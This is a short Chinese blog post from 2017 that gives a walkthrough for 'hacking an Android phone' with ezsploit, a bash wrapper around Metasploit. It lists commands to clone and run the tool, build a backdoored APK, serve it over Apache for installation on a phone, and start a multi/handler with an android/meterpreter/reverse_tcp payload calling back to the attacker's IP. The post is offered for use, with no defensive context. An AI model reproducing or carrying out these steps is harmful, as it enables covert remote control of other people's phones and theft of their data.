Bboysoul's Blog

首页 公告 RSS

如何黑入安卓手机(ezsploit)

July 29, 2017 本文有 397 个字 需要花费 1 分钟阅读

简介

ezsploit是一款linux bash脚本。用来快速生成木马远程监控。

项目地址

https://github.com/rand0m1ze/ezsploit

安装

安装很简单clone
git clone https://github.com/rand0m1ze/ezsploit.git
cd ezsploit
chmod +x ezsploit.sh

运行

./ezsploit.sh

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::::::::::::: Metasploit service started :::::::::::::::::
:::::: Scripts and payloads saved to ~/Desktop/temp/ ::::::
:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
Press [Enter] key to Continue...

回车就好

:::::::::::::: Metasploit automation script :::::::::::::::
                      ______
                   .-        -.
                  /            \               by rand0m1ze
     *                    * 
                 |,  .-.  .-.  ,|        * 
                 | )(_ /  \_ )( |
                 |/     /\     \|    * 
       (@_       <__    ^^    __>         * 
  _     ) \_______\__|IIIIII|__/_______________________ 
 (_)@8@8{}<_____________________________________________> 
        )_/         \ IIIIII /                    ::::: 
       (@            --------                        :: 
        
_________________________[ SELECT AN OPTION TO BEGIN ]
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
:::[1] Payload        [Create a payload with msvenom]  
:::[2] Listen     [Start a multi handler]   
:::[3] Exploit        [Drop into msfconsole]
:::[4] Persistence         [Forge a Persistence script] 
:::[5] Armitage        [Launch Armitage GUI]  
:::[X] Hack The Gibson     [Hac/< The P1aneT]   
::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
~~~~~~~~~~~~~~~~~~~~ Greetz to the 2600 ~~~~~~~~~~~~~~~~~~~~

之后输入对应的数字,进行对应的操作
先输入1生成一个payload
他会让你选择什么payload,因为要黑安卓手机,所以选择安卓手机的

::::: Lets Craft a PAYLOAD:::::
1) Windows
2) Linux
3) Mac
4) Android
5) List_All
6) Quit
Enter your choice 6=QUIT: 

之后设置ip和端口,ip是本机的,端口随意
生成的后门apk位于
~/Desktop/temp
因为复制拷贝太麻烦了,所以你可以直接打开apache来下载文件安装在手机上,之后监听再运行木马程序就可以了
输入msfconsole打开metasploit
use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 1.1.1.13
exploit

视频地址

https://asciinema.org/a/6HBuKXn5O1rlehUrP9fN1gbE8


Tags:

本站总访问量 本站总访客数